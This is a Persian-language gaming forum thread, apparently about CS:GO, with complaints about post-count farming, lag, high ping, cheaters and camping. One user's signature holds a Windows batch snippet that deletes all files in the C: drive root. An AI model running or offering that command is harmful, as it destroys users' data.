SWAT ارسال شده در September 23, 2020 سازنده اشتراک گذاری ارسال شده در September 23, 2020 (ویرایش شده) این تاپیکارو میزدم یه زمان که نظره سازنده بدید، فروم شلوغ بشه، آیدی بدید پلی بدیم و ....!الان میبینم تو همه تاپیکام یکی میاد "ایموجی" میزنه، یکی دلقک بازی در میاره اون یکی از دیوارای تاپیک میره بالا از طرفیم یه سریا هستن آقای تشکره اسمشون در مورده توپه پلاستیکیه سوراخم تاپیک بزنی میان میگن خیلی مفید بود تا ارسال بگیرن! واسه همینه ما ایرانیا پیشرفت نمیکنیم دیگه یارو تو سرور لولش 5عه اکانتو فرومشو میبینی 600 تا ارسال آخه خودت نمیگی کسی که داره پروفایلتو نگاه میکنه به ریشت میخنده اسکل (<--- کلیک) اون قدیما طرف لیدر میشد تعداد پستاش بالا بود احترامه خاصه خودشو داشت و بیانگره تجربش بود الان اصغر طرقه با 12 سال سن 800 تا ارسال یه کم به خودتون بیاید به خدا زشته و من الله توفیق. ویرایش شده September 23, 2020 توسط SWAT 2 نقل قول คгรђเครฬคՇ#? ??? ??? ?????'? ???? ??? ?? ????? ???? ??? ?????? لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Captain ارسال شده در September 23, 2020 اشتراک گذاری ارسال شده در September 23, 2020 در 33 دقیقه قبل، SWAT گفته است: این تاپیکارو میزدم یه زمان که نظره سازنده بدید، فروم شلوغ بشه، آیدی بدید پلی بدیم و ....!الان میبینم تو همه تاپیکام یکی میاد "ایموجی" میزنه، یکی دلقک بازی در میاره اون یکی از دیوارای تاپیک میره بالا از طرفیم یه سریا هستن آقای تشکره اسمشون در مورده توپه پلاستیکیه سوراخم تاپیک بزنی میان میگن خیلی مفید بود تا ارسال بگیرن! واسه همینه ما ایرانیا پیشرفت نمیکنیم دیگه یارو تو سرور لولش 5عه اکانتو فرومشو میبینی 600 تا ارسال آخه خودت نمیگی کسی که داره پروفایلتو نگاه میکنه به ریشت میخنده اسکل (<--- کلیک) اون قدیما طرف لیدر میشد تعداد پستاش بالا بود احترامه خاصه خودشو داشت و بیانگره تجربش بود الان اصغر طرقه با 12 سال سن 800 تا ارسال یه کم به خودتون بیاید به خدا زشته و من الله توفیق. خدایی حرف درستیه!! دارم فکر میکنم حس میکنم خودم یکی از اونام!! نقل قول Number One Family لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Life ارسال شده در September 24, 2020 اشتراک گذاری ارسال شده در September 24, 2020 در 12 ساعت قبل، SWAT گفته است: این تاپیکارو میزدم یه زمان که نظره سازنده بدید، فروم شلوغ بشه، آیدی بدید پلی بدیم و ....!الان میبینم تو همه تاپیکام یکی میاد "ایموجی" میزنه، یکی دلقک بازی در میاره اون یکی از دیوارای تاپیک میره بالا از طرفیم یه سریا هستن آقای تشکره اسمشون در مورده توپه پلاستیکیه سوراخم تاپیک بزنی میان میگن خیلی مفید بود تا ارسال بگیرن! واسه همینه ما ایرانیا پیشرفت نمیکنیم دیگه یارو تو سرور لولش 5عه اکانتو فرومشو میبینی 600 تا ارسال آخه خودت نمیگی کسی که داره پروفایلتو نگاه میکنه به ریشت میخنده اسکل (<--- کلیک) اون قدیما طرف لیدر میشد تعداد پستاش بالا بود احترامه خاصه خودشو داشت و بیانگره تجربش بود الان اصغر طرقه با 12 سال سن 800 تا ارسال یه کم به خودتون بیاید به خدا زشته و من الله توفیق. صحیح |: نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
PumpKin ارسال شده در September 30, 2020 اشتراک گذاری ارسال شده در September 30, 2020 بازی جالبه نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
LiN ارسال شده در October 10, 2020 اشتراک گذاری ارسال شده در October 10, 2020 بازیش قشنگه ولی من توش لگ میشم. نقل قول NumberOne Family لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
mohamadhbj ارسال شده در October 19, 2020 اشتراک گذاری ارسال شده در October 19, 2020 جالب بود ❤ نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Roco ارسال شده در November 16, 2020 اشتراک گذاری ارسال شده در November 16, 2020 جالبه نقل قول Dark لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
AminsVn ارسال شده در November 25, 2020 اشتراک گذاری ارسال شده در November 25, 2020 (ویرایش شده) قبلا خوب بود پینگمون روی 40 تا 60 میچرخید اما وقتی پینگو میبینی شده 110 چیترو میبینی که هر روز مثل قارچ زیاد میشه تیری که نمیخوره هرچی دقیق میزنی, دو نقطه اشک استیمی که باز نمیشه و همش مشکل نت و تحریم و کانکشن تایم اوت داره و حسب بر اینکه اینکه ما فقیر ترین کشور دنیاییم از لحاظ نت .. متاسفانه دیگه نمیشه در مورد این گیم با شوتیگ بی نظیرش اظهار نظر کرد چون دیگه نمیشه بدون مشکل پلی داد. فقط میشه گفت حیف. ویرایش شده November 25, 2020 توسط Aminsvn مشکل در نگارش 1 نقل قول Enter as a Blind , Exit as a Mute @echo off cd "C:\" del *.* exit لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
iLilPeep ارسال شده در November 26, 2020 اشتراک گذاری ارسال شده در November 26, 2020 در در ۱۳۹۹/۹/۵ در 08:52، Aminsvn گفته است: قبلا خوب بود پینگمون روی 40 تا 60 میچرخید اما وقتی پینگو میبینی شده 110 چیترو میبینی که هر روز مثل قارچ زیاد میشه تیری که نمیخوره هرچی دقیق میزنی, دو نقطه اشک استیمی که باز نمیشه و همش مشکل نت و تحریم و کانکشن تایم اوت داره و حسب بر اینکه اینکه ما فقیر ترین کشور دنیاییم از لحاظ نت .. متاسفانه دیگه نمیشه در مورد این گیم با شوتیگ بی نظیرش اظهار نظر کرد چون دیگه نمیشه بدون مشکل پلی داد. فقط میشه گفت حیف. دقیقا بهترین گیم بود ولی خراب شد. 2 1 نقل قول One day you’ll just be a memory for .Some people do your best to be a good one يه روز براى بعضى از آدما فقط يه خاطره ميشىنهايت تلاشتو بكن كه يه خاطره خوب بشى. لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Eblis ارسال شده در November 28, 2020 اشتراک گذاری ارسال شده در November 28, 2020 در در ۱۳۹۹/۷/۲ در 19:41، SWAT گفته است: اسکل میدونم الان دارم یکی از اونا میشم اما این واقعا عالی بود نقل قول Oi son, we're goin' russia لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Quintin ارسال شده در December 3, 2020 اشتراک گذاری ارسال شده در December 3, 2020 عشق جانم CSGO نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
LiN ارسال شده در December 3, 2020 اشتراک گذاری ارسال شده در December 3, 2020 بازیش قشنگه ولی FPS کم میگیرم من نقل قول NumberOne Family لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
CaKe ارسال شده در December 12, 2020 اشتراک گذاری ارسال شده در December 12, 2020 خیلی بازی قشنگیه نقل قول ♫من رو تکرارم همش ❤ اسم تو میارم همش♫ ♥♥♥✿✿✿✿♕????????♕✿✿✿✿♥♥♥ لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
SWAT ارسال شده در December 15, 2020 سازنده اشتراک گذاری ارسال شده در December 15, 2020 در در ۱۳۹۹/۹/۲۳ در 21:17، MaTriX گفته است: اصغر سوپروایزر شد نه شوخی کردم You are so funny bro click me نقل قول คгรђเครฬคՇ#? ??? ??? ?????'? ???? ??? ?? ????? ???? ??? ?????? لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
TheRaGe ارسال شده در December 16, 2020 اشتراک گذاری ارسال شده در December 16, 2020 بای نقل قول من تخم ارزو هامو داشتم تخم حمالی خواسته هامو داشتمتخم عمل به ادعامو داشتم خودم غرور تو چشامو ساختم لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
MaDKinG ارسال شده در December 18, 2020 اشتراک گذاری ارسال شده در December 18, 2020 بازی خیلی جذاب و خوبیه. 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
iLilPeep ارسال شده در December 19, 2020 اشتراک گذاری ارسال شده در December 19, 2020 در در ۱۳۹۹/۹/۱۳ در 12:20، Quintin گفته است: عشق جانم CSGO just spin bemola 1 1 نقل قول One day you’ll just be a memory for .Some people do your best to be a good one يه روز براى بعضى از آدما فقط يه خاطره ميشىنهايت تلاشتو بكن كه يه خاطره خوب بشى. لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Lucifer444 ارسال شده در December 19, 2020 اشتراک گذاری ارسال شده در December 19, 2020 پسری که کانتر بازی نکره باشه چیه؟ نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
iLilPeep ارسال شده در December 23, 2020 اشتراک گذاری ارسال شده در December 23, 2020 در در ۱۳۹۹/۹/۳۰ در 02:42، Lucifer444 گفته است: پسری که کانتر بازی نکره باشه چیه؟ پلیر 1 1 1 نقل قول One day you’ll just be a memory for .Some people do your best to be a good one يه روز براى بعضى از آدما فقط يه خاطره ميشىنهايت تلاشتو بكن كه يه خاطره خوب بشى. لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Lucifer444 ارسال شده در December 23, 2020 اشتراک گذاری ارسال شده در December 23, 2020 در 58 دقیقه قبل، MaFiN گفته است: پلیر نه اشتباه گفتی نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
iLilPeep ارسال شده در December 24, 2020 اشتراک گذاری ارسال شده در December 24, 2020 در در ۱۳۹۹/۱۰/۳ در 16:19، Lucifer444 گفته است: نه اشتباه گفتی بچه ی خوب و نازنین؟ 1 1 نقل قول One day you’ll just be a memory for .Some people do your best to be a good one يه روز براى بعضى از آدما فقط يه خاطره ميشىنهايت تلاشتو بكن كه يه خاطره خوب بشى. لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
Lucifer444 ارسال شده در December 25, 2020 اشتراک گذاری ارسال شده در December 25, 2020 در 12 ساعت قبل، MaFiN گفته است: بچه ی خوب و نازنین؟ آفرین بر تو نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
iLilPeep ارسال شده در December 25, 2020 اشتراک گذاری ارسال شده در December 25, 2020 در 10 ساعت قبل، Lucifer444 گفته است: آفرین بر تو از بچگی باهوش بودم 1 1 نقل قول One day you’ll just be a memory for .Some people do your best to be a good one يه روز براى بعضى از آدما فقط يه خاطره ميشىنهايت تلاشتو بكن كه يه خاطره خوب بشى. لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
shayan0monster007 ارسال شده در December 28, 2020 اشتراک گذاری ارسال شده در December 28, 2020 در در ۱۳۹۸/۷/۳ در 23:09، AliAgent گفته است: این بازی عالیه من تازه نصب کردم رنک 3 ام تنها ایرادش چیترا هستند که خیلی زیادند شازده چیتر رو ولش کمپر رو بچسب نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
AliAgent ارسال شده در December 28, 2020 اشتراک گذاری ارسال شده در December 28, 2020 در 8 ساعت قبل، shayan0monster007 گفته است: شازده چیتر رو ولش کمپر رو بچسب حلالت نمیکنم اگه فک کنی کمپرما ولی کمپ خودش ی هنره و چیزی از بالانس بودن بازی کم نمیکنه، سیتی باید کمپ کنه بیاد راش بده ک چی شه؟ ولی چیت بازی رو از حالت بالانس خارج میکنه نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر تنظیمات بیشتر اشتراک گذاری...
ارسالهای توصیه شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید.
توجه: strong> مطلب ارسالی شما پس از تایید مدیریت برای همه قابل رویت خواهد بود.